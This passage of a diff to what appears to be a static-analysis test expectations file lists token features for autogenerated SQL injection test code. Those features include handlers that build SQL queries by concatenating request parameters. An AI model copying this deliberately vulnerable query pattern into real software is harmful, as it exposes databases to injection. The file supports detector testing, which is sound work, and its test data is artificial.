PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:34:16:41 | category | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:34:16:41 | category | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:16:44 | this | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:16:44 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:16:44 | this | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:16:44 | this | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:16:44 | this | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | 'arguments' object of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | 'arguments' object of anonymous function | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | exceptional return of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | exceptional return of anonymous function | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | exceptional return of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | exceptional return of anonymous function | fileImports | express pg | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | functio ... lts\\n } | CalleeFlexibleAccessPath | pool.query | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | functio ... lts\\n } | InputArgumentIndex | 2 | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | functio ... lts\\n } | calleeImports | pg | @@ -4487,12 +21581,54 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | functio ... lts\\n } | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | functio ... lts\\n } | fileImports | express pg | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | functio ... lts\\n } | receiverName | pool | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | return of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | return of anonymous function | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | return of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:45:18:3 | return of anonymous function | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:54:16:56 | err | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:54:16:56 | err | contextSurroundingFunctionParameters | (req, res)\n(err, results) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:54:16:56 | err | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:54:16:56 | err | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:54:16:56 | err | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:59:16:65 | results | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:59:16:65 | results | contextSurroundingFunctionParameters | (req, res)\n(err, results) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:59:16:65 | results | enclosingFunctionBody | req res query1 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE pool query query1 err results query2 SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE pool query query2 req params category err results | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:59:16:65 | results | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:59:16:65 | results | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:7 | require | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:7 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:7 | require | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:18 | exceptional return of require('express') | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:18 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:18 | exceptional return of require('express') | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:18 | require('express') | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:18 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:18 | require('express') | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:20 | exceptional return of require('express')() | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:20 | exceptional return of require('express')() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:20 | exceptional return of require('express')() | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:20 | require('express')() | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:20 | require('express')() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:20 | require('express')() | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:24 | require ... )().get | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:24 | require ... )().get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:24 | require ... )().get | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:41 | exceptional return of require ... andler) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:41 | exceptional return of require ... andler) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:41 | exceptional return of require ... andler) | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:41 | require ... andler) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:41 | require ... andler) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:1:21:41 | require ... andler) | fileImports | express pg | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:9:21:17 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:9:21:17 | 'express' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:9:21:17 | 'express' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:9:21:17 | 'express' | contextFunctionInterfaces | handler(req, res) | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:9:21:17 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:9:21:17 | 'express' | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:22:21:24 | get | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:22:21:24 | get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:22:21:24 | get | fileImports | express pg | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:26:21:31 | '/foo' | CalleeFlexibleAccessPath | import(!)().get | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:26:21:31 | '/foo' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:26:21:31 | '/foo' | calleeImports | express | @@ -4505,12 +21641,106 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:34:21:40 | handler | contextFunctionInterfaces | handler(req, res) | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:34:21:40 | handler | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:21:34:21:40 | handler | fileImports | express pg | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:1:1:1:0 | this | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:1:1:1:1 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:1:1:1:1 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:1:1:1:1 | db | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:1:1:1:1 | require | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:5:3:11 | sqlite3 | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:5:3:11 | sqlite3 | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:5:3:11 | sqlite3 | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:5:3:42 | sqlite3 | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:5:3:42 | sqlite3 | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:5:3:42 | sqlite3 | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:5:3:42 | sqlite3 ... rbose() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:5:3:42 | sqlite3 ... rbose() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:5:3:42 | sqlite3 ... rbose() | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:21 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:21 | require | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:32 | exceptional return of require('sqlite3') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:32 | exceptional return of require('sqlite3') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:32 | exceptional return of require('sqlite3') | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:32 | require('sqlite3') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:32 | require('sqlite3') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:32 | require('sqlite3') | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:40 | require ... verbose | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:40 | require ... verbose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:40 | require ... verbose | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:42 | exceptional return of require ... rbose() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:42 | exceptional return of require ... rbose() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:42 | exceptional return of require ... rbose() | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:42 | require ... rbose() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:42 | require ... rbose() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:15:3:42 | require ... rbose() | fileImports | sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:23:3:31 | 'sqlite3' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:23:3:31 | 'sqlite3' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:23:3:31 | 'sqlite3' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:23:3:31 | 'sqlite3' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:23:3:31 | 'sqlite3' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:23:3:31 | 'sqlite3' | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:34:3:40 | verbose | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:34:3:40 | verbose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:3:34:3:40 | verbose | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:5:4:6 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:5:4:6 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:5:4:6 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:5:4:6 | db | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:5:4:41 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:5:4:41 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:5:4:41 | db | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:5:4:41 | db = ne ... mory:') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:5:4:41 | db = ne ... mory:') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:5:4:41 | db = ne ... mory:') | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:10:4:41 | exceptional return of new sql ... mory:') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:10:4:41 | exceptional return of new sql ... mory:') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:10:4:41 | exceptional return of new sql ... mory:') | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:10:4:41 | new sql ... mory:') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:10:4:41 | new sql ... mory:') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:10:4:41 | new sql ... mory:') | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:14:4:20 | sqlite3 | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:14:4:20 | sqlite3 | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:14:4:20 | sqlite3 | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:14:4:29 | sqlite3.Database | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:14:4:29 | sqlite3.Database | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:14:4:29 | sqlite3.Database | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:22:4:29 | Database | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:22:4:29 | Database | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:22:4:29 | Database | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:31:4:40 | ':memory:' | CalleeFlexibleAccessPath | sqlite3.Database | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:31:4:40 | ':memory:' | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:31:4:40 | ':memory:' | calleeImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:31:4:40 | ':memory:' | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:31:4:40 | ':memory:' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:4:31:4:40 | ':memory:' | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:6:7 | angular | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:6:7 | angular | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:6:7 | angular | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:6:14 | angular.module | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:6:14 | angular.module | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:6:14 | angular.module | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:6:36 | angular ... oute']) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:6:36 | angular ... oute']) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:6:36 | angular ... oute']) | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:6:36 | exceptional return of angular ... oute']) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:6:36 | exceptional return of angular ... oute']) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:6:36 | exceptional return of angular ... oute']) | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:7:11 | angular ... troller | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:7:11 | angular ... troller | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:7:11 | angular ... troller | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:9:2 | angular ... "');\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:9:2 | angular ... "');\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:9:2 | angular ... "');\\n}) | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:9:2 | exceptional return of angular ... "');\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:9:2 | exceptional return of angular ... "');\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:1:9:2 | exceptional return of angular ... "');\\n}) | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:9:6:14 | module | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:9:6:14 | module | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:9:6:14 | module | fileImports | sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:16:6:22 | 'myApp' | CalleeFlexibleAccessPath | angular.module | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:16:6:22 | 'myApp' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:16:6:22 | 'myApp' | contextFunctionInterfaces | | @@ -4524,18 +21754,90 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:25:6:35 | ['ngRoute'] | fileImports | sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:25:6:35 | ['ngRoute'] | receiverName | angular | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:26:6:34 | 'ngRoute' | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:26:6:34 | 'ngRoute' | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:26:6:34 | 'ngRoute' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:26:6:34 | 'ngRoute' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:26:6:34 | 'ngRoute' | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:6:26:6:34 | 'ngRoute' | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:2:7:11 | controller | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:2:7:11 | controller | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:2:7:11 | controller | fileImports | sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:13:7:22 | 'FindPost' | CalleeFlexibleAccessPath | angular.module().controller | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:13:7:22 | 'FindPost' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:13:7:22 | 'FindPost' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:13:7:22 | 'FindPost' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:13:7:22 | 'FindPost' | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:7:24 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:7:24 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:7:24 | db | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:7:24 | db | enclosingFunctionName | controller#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:7:24 | db | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:7:24 | this | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:7:24 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:7:24 | this | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:7:24 | this | enclosingFunctionName | controller#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:7:24 | this | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | 'arguments' object of anonymous function | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | 'arguments' object of anonymous function | enclosingFunctionName | controller#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | 'arguments' object of anonymous function | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | exceptional return of anonymous function | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | exceptional return of anonymous function | enclosingFunctionName | controller#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | exceptional return of anonymous function | fileImports | sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | functio ... '"');\\n} | CalleeFlexibleAccessPath | angular.module().controller | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | functio ... '"');\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | functio ... '"');\\n} | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | functio ... '"');\\n} | contextSurroundingFunctionParameters | ($routeParams) | | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | functio ... '"');\\n} | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | return of anonymous function | enclosingFunctionBody | $routeParams db get SELECT * FROM Post WHERE id = " $routeParams id " | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | return of anonymous function | enclosingFunctionName | controller#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:25:9:1 | return of anonymous function | fileImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/tst4.js:7:34:7:45 | 